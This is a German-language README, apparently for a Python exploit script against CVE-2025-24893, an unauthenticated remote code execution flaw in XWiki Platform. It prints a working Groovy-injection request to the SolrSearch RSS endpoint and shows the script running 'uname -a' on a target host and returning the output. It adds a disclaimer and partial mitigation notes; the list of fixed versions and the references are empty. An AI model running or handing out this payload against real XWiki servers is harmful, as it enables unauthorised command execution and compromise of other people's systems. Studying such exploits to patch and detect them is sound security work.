
Python-Exploit-Skript für CVE-2025-24893, eine kritische, nicht authentifizierte RCE in XWiki Platform. Führt beliebigen Groovy-Code über eine manipulierte RSS-Anfrage an den SolrSearch-Endpunkt aus. Enthält eine Bedienungsanleitung und Referenzen zur Schadensbegrenzung.
CVE-2025-24893 ist eine kritische, nicht authentifizierte Remote-Code-Ausführung (RCE)-Schwachstelle, die die XWiki Platform betrifft.
Diese Schwachstelle ermöglicht es jedem Gastbenutzer, beliebigen Groovy-Code einzuschleusen und auszuführen – ohne Authentifizierung – über eine speziell gestaltete RSS-Anfrage an den SolrSearch-Endpunkt.
Dies wirkt sich direkt auf die Vertraulichkeit, Integrität und Verfügbarkeit des betroffenen Systems aus.
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H⚠️ Haftungsausschluss:
Dieser Code ist ausschließlich für Bildungs- und Forschungszwecke bestimmt. Die unbefugte Nutzung auf Systemen ohne ausdrückliche Genehmigung kann einen Gesetzesverstoß darstellen. Der Autor übernimmt keine Verantwortung für Missbrauch oder böswillige Aktivitäten im Zusammenhang mit diesem Tool.
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=}}}{{async async=false}}{{groovy}}println("Hello from search text:42"){{/groovy}}{{/async}}
Dieser Abschnitt erklärt, wie Sie das Python-Exploit-Skript einrichten und ausführen, um CVE-2025-24893 auszunutzen.
❯ python3 CVE-2025-24893.py
usage: CVE-2025-24893.py [-h] -u URL -c COMMAND
CVE-2025-24893.py: error: the following arguments are required: -u/--url, -c/--command
❯ python3 CVE-2025-24893.py -u http://10.10.10.10:8080 -c 'uname -a'
[*] Sending payload to: http://10.10.10.10:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7d%7d%7d%7b%7basync%20async%3dfalse%7d%7d%7b%7bgroovy%7d%7dprintln("uname -a".execute().text)%7b%7b%2fgroovy%7d%7d%7b%7b%2fasync%7d%7d
[+] Command output 'uname -a':
Linux 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC 2025 x86_64 x86_64 x86_64 GNU/Linux
Um die Schwachstelle zu beheben, aktualisieren Sie XWiki auf eine der folgenden Versionen:
Wenn ein Update nicht sofort möglich ist, können Sie einen vorübergehenden Fix anwenden:
SolrSearchMacros.xml (befindet sich unter Main.SolrSearchMacros) um Zeile 955.rawResponse-Makro mit dem auf application/xml gesetzten Inhaltstyp zu verwenden.macros.vm in Zeile 2824 als Referenz.Referenzen: